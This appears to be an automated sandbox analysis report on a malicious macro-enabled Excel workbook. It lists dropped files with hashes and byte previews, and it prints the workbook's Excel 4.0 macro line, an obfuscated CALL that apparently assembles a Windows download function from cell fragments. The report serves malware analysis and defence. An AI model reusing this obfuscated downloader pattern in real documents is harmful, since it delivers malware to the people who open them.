                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):893
                        Entropy (8bit):7.366016576663508
                        Encrypted:false
                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):3.116981173650867
                        Encrypted:false
                        SSDEEP:6:kKpkwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:xkwTJ6HkPlE99SNxAhUe0ht
                        MD5:43FEDDF6125786240E77A15E8506956C
                        SHA1:44DD6D17C4BC8091E1A43E80269685BDEEDF0CA6
                        SHA-256:5EEF20087B9729D792C1DFD8C9D3AFD560BFFEDFC0387B8E24F6B9A3B436171D
                        SHA-512:B7B55758E3B1FD21E6B891B68ECF7464F1B23816245DCC11D6978C90E2EF521D21B3014E63995601D52755974E00FE92BAE2DECD1FB70744C0973414947678D8
                        Malicious:false
                        Reputation:low
                        Preview: p...... ..........%..7..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):252
                        Entropy (8bit):2.972916797453669
                        Encrypted:false
                        SSDEEP:3:kkFkl7XystfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kKgys6QE1liBAIdQZV7ulPPN
                        MD5:758CE1957CD58A444A212C141CB02AF6
                        SHA1:FB0CBB0A9445ED225041C1C510A835E7CFA1A710
                        SHA-256:95C56FA78260FE9477E54DD2BA320463938D27456756029F924B6F7ADE0035A3
                        SHA-512:DC39847B320D01A1BE0D4228FE41A08407A1C4FAE4C5839794AD2EB3D19F8205EB27A0AE8DC2D91E01808F032CE6EA1EA750020526DD033DD29D07F342AD24CC
                        Malicious:false
                        Reputation:low
                        Preview: p...... ....`...p...7..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27312AD1.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):8301
                        Entropy (8bit):7.970711494690041
                        Encrypted:false
                        SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                        MD5:D8574C9CC4123EF67C8B600850BE52EE
                        SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                        SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                        SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFA9C607.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):557
                        Entropy (8bit):7.343009301479381
                        Encrypted:false
                        SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                        MD5:A516B6CB784827C6BDE58BC9D341C1BD
                        SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                        SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                        SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2F7729E.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):34763
                        Entropy (8bit):7.986637319641011
                        Encrypted:false
                        SSDEEP:768:lA0uJplS4SbWDJkL9JHwQ6PJ62J9BW5/B8CViyDN/2FYpoHnmAG:en/dDuL7QQ64eyZJViW++poHnu
                        MD5:D2305F0A3120806573D5FE3059DDB37D
                        SHA1:2337E6CBC06F4C594514D2D19B0B6511FEB1E52D
                        SHA-256:94CA1D71554FAF2112290CF3DECB6C5C853E916E73EC7F2E00162ED468C29AAC
                        SHA-512:9E68F2AFCF83AFCEA3569CC42F232F276EAAB8EE7E5D0642DA1512BF159AC1E9E777289FD30EADE38A46CAA0965A59CC8899B44ACD46B2BEDF1E4A800AD33419
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+.....pIDATx^....]E.>...{%..@.R....]...>....?...>....`C...kHBBz.7...o......{...#.sg.^.f.5......{P.I5.j`.h....'.X.p..k...7l.j.*.Te>..loo.?~....8..3g...z.......Z....R......./5`6-Y.dY.r..-[.4d>;v.hjj...hnn..h.......5j..>#F.....5.......,.3fL.lw*...@..{H..k.U.....~..5k..%...t.[..c.>..=...:...5.D..x=.{-.y/k.........}......G......U..s.^z..]t...<yruu.n}]Zy..@....GRy....m.......E...:......D.;v.)S...g.../?..S...:.?.H...E*I...P...Y...s....C...W.v ..y.^.....).^.!}..@..{^.........q>.H.......R....7.+.x.._=u..~"R*.n.@..U.i..X......=...7.p.-.8H.3.GE*...z.^...M.8......Q.)^..^Ke...Z.........^..a..d.......}.co|..{QG....@.....R)....z.?...w.y.CE`......y.....;..T.>..5..u..T.=...,..I.....?...o.w..6.e/{.g>...#}TeZM..@....WR.... ..u..._......_.....n.!.gmm-.;.ZSS..:.&..}.t......Y0...Z.<..O|...\p..C....w.I..x.'.....i`..0.R3.7n...{/b..2m.4Q-3g.4i.....o.j.M.q.....6..i..A.|...T+V.X.t).
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E734D85C.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):848
                        Entropy (8bit):7.595467031611744
                        Encrypted:false
                        SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                        MD5:02DB1068B56D3FD907241C2F3240F849
                        SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                        SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                        SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                        Malicious:false
                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                        C:\Users\user\AppData\Local\Temp\B4EE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):85971
                        Entropy (8bit):7.900862374840665
                        Encrypted:false
                        SSDEEP:1536:pwiMs3eTfTWKTam373dn/dDuL7QQ64eyZJViW++poHn8M:+iMs3eTLWKTj3hwXQQteyZJAW++4J
                        MD5:BBD9F4B93B892A6C599E154AA2167DE6
                        SHA1:CF444640E07BA0380F824B036F18A713A07DD5AD
                        SHA-256:2256237AB12C0A386F5D957925F992BB67E3DD34ADF6D47D5FEACF3D74AA49E6
                        SHA-512:EC137F1E0F139D1BF38D44A1ED54A861AE17FEE2921B8128A0AF447B0669F6BD4D7F755483ED8530270883CB656BABE8C93F64338B09679E8575917C349DC378
                        Malicious:false
                        Preview: .U.n.0....?..........C....I?.&..an.0........%'.E...y#..W.k.'...k.E3c.8.v].~>.._X.I8%.w.- .Z|.0.......[...r...+......|.".m.x.r-:....g..K.R.2.[..J<.T]o....R;V}...Z&B0Z.DF..S."._.....%..C....H.4!jR...........;..6{..#".<....rh.YJ.^..Da...W^.a....F....1..Ki...>.....$9L.5l$..$.X!..vbi..v/.O(.$.r.. ..Gr....B<....P..d3..3.7.[..'..6.}.C.S..G..r....F....1m...\.vG:....>......?.G|.(...>\.?..........p~./....@D.....;6J..4E..<.. .&...m^v../.......PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\CabEF40.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                        Category:dropped
                        Size (bytes):58596
                        Entropy (8bit):7.995478615012125
                        Encrypted:true
                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                        MD5:61A03D15CF62612F50B74867090DBE79
                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                        Malicious:false
                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                        C:\Users\user\AppData\Local\Temp\TarEF41.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):152788
                        Entropy (8bit):6.309740459389463
                        Encrypted:false
                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                        Malicious:false
                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Apr 22 21:19:44 2021, atime=Thu Apr 22 21:19:44 2021, length=8192, window=hide
                        Category:dropped
                        Size (bytes):867
                        Entropy (8bit):4.476004756716363
                        Encrypted:false
                        SSDEEP:12:85QccLgXg/XAlCPCHaXtB8XzB/BV2X+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP9TK:85pK/XTd6jsYeQSDv3qIrNru/
                        MD5:01D0477068BF1A5E9098C6988ACB7CEC
                        SHA1:A4FF408973CEDEE8DBD65881BB38CEE0D40CE98E
                        SHA-256:7602D53263F00A356531297C3BF60CD974C1AFBEDE08A0A4A8958B2FA720CA3A
                        SHA-512:AED9C659A98787224AA25BF8C77D321F099BFD245BB3EAE60352BE8D4F7938BF31AAB56004BC8C8C290E6501E4B8FF881461D1EE49FA371EBF767AE58E4581D8
                        Malicious:false
                        Preview: L..................F...........7G..k....7..k....7... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rw...Desktop.d......QK.X.Rw.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-752139500.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Apr 22 21:19:44 2021, atime=Thu Apr 22 21:19:44 2021, length=85971, window=hide
                        Category:dropped
                        Size (bytes):2118
                        Entropy (8bit):4.534447541439436
                        Encrypted:false
                        SSDEEP:48:8m/XT0jFVv4612mHNIQh2m/XT0jFVv4612mHNIQ/:8m/XojFd7tIQh2m/XojFd7tIQ/
                        MD5:E732BED9C798C5172CC58E780EB158BD
                        SHA1:BA28F863C47B51497505A2A4E4A67BA636A1F836
                        SHA-256:0A9C90934B625CEC640C2F8BBE1D1B21518197AB423EA23DB534BBEF7D7DA7B6
                        SHA-512:6F3577A1A2D519ADC9A99061FD34835C476453ADB5AC0A2D402DFC60296D149891E578BE8500D96F05989320AA8BDEC01693BEFEF18D52C8CF97EC322437D566
                        Malicious:false
                        Preview: L..................F.... ...lV...{..k....7...g...7...O...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..O...Rs. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.7.5.2.1.3.9.5.0.0...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\document-752139500.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.7.5.2.1.3.9.5.0.0...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N.
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):109
                        Entropy (8bit):4.745094765764425
                        Encrypted:false
                        SSDEEP:3:oyBVomxWKS9LROc+FSZELROc+FSmxWKS9LROc+FSv:dj49LFswELFsy9LFsc
                        MD5:6640E7B8874CEE7AA7C3D10EBF38B703
                        SHA1:75B0377EF3D79B7952DBCBBBBF335CC9E4FF7CFF
                        SHA-256:FC5AD410AA5BF18D6F9A0314BB78EBC3C6302C5CCAD5334778D13978C1B850FA
                        SHA-512:B9B438B1973863893E21426539615D8A31372D3EA6BA80B5A546EF46F1A6AB789110989E317D3BED38E216AD4A6EFADAFA65DCD5DF3CECE2440E3573D3DB2B78
                        Malicious:false
                        Preview: Desktop.LNK=0..[misc]..document-752139500.LNK=0..document-752139500.LNK=0..[misc]..document-752139500.LNK=0..
                        C:\Users\user\Desktop\75EE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):85971
                        Entropy (8bit):7.900967305459501
                        Encrypted:false
                        SSDEEP:1536:pwiMs3eTfTWKTam373dn/dDuL7QQ64eyZJViW++poHnD:+iMs3eTLWKTj3hwXQQteyZJAW++4D
                        MD5:F80E3576A3D13580A3C13E3038591035
                        SHA1:5CA5620BF67A9BABE5C4EBBFB91C4EBDE777C4D3
                        SHA-256:08F67B05BC60BB9987CE49AD2B99FBA1549CA9D6F1DC13C2A057F5A1DAE1CBF3
                        SHA-512:DA4578B55432D9688D1078E958B6FD828FD0DA27BF3E31F8ADB16C6362D3707A5E577D74416FFC0E147993E7DE26F564E5DDC16D74AC37E37F68E7477D33EE99
                        Malicious:false
                        Preview: .U.n.0....?..........C....I?.&..an.0........%'.E...y#..W.k.'...k.E3c.8.v].~>.._X.I8%.w.- .Z|.0.......[...r...+......|.".m.x.r-:....g..K.R.2.[..J<.T]o....R;V}...Z&B0Z.DF..S."._.....%..C....H.4!jR...........;..6{..#".<....rh.YJ.^..Da...W^.a....F....1..Ki...>.....$9L.5l$..$.X!..vbi..v/.O(.$.r.. ..Gr....B<....P..d3..3.7.[..'..6.}.C.S..G..r....F....1m...\.vG:....>......?.G|.(...>\.?..........p~./....@D.....;6J..4E..<.. .&...m^v../.......PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\Desktop\~$document-752139500.xlsm
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):330
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                        Malicious:true
                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                        Static File Info

                        General

                        File type:Microsoft Excel 2007+
                        Entropy (8bit):7.9018876341738515
                        TrID:
                        • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                        • ZIP compressed archive (8000/1) 16.67%
                        File name:document-752139500.xlsm
                        File size:85997
                        MD5:0230e912063f0d55408aa5fb25866d92
                        SHA1:454b82fabe618b94265599d4bb680270abfe68de
                        SHA256:824cd169a5d68c035a1b8e6cf0f6ac56085c77a93bfabfffce6452fd5790a5e4
                        SHA512:0dda176cf3c11d24c48d597a734a409542659cec630d5bb61e8cfab19e93faec6366e25c30775bb3b135d1e2311e756b22b9daad8e880f415fda265822bf102e
                        SSDEEP:1536:j8uszH1eCfA0RIeO71TzuE/En/dDuL7QQ64eyZJViW++poHnpx:oV1eCUREwXQQteyZJAW++4r
                        File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                        File Icon

                        Icon Hash:e4e2aa8aa4bcbcac

                        Static OLE Info

                        General

                        Document Type:OpenXML
                        Number of OLE Files:1

                        OLE File "document-752139500.xlsm"

                        Indicators

                        Has Summary Info:
                        Application Name:
                        Encrypted Document:
                        Contains Word Document Stream:
                        Contains Workbook/Book Stream:
                        Contains PowerPoint Document Stream:
                        Contains Visio Document Stream:
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:

                        Macro 4.0 Code

                        CALL(Sheet2!AW23&"n",Sheet2!AW24&"A",Sheet2!AW22,Sheet2!BD15,Sheet3!A102,Sheet2!AZ29,0,0)=CALL(Sheet2!AW23&"n", Sheet2!AW24&"A", Sheet2!AW22, Sheet2!BD15, Sheet3!A103, Sheet2!AZ30, 0, 0)
                        
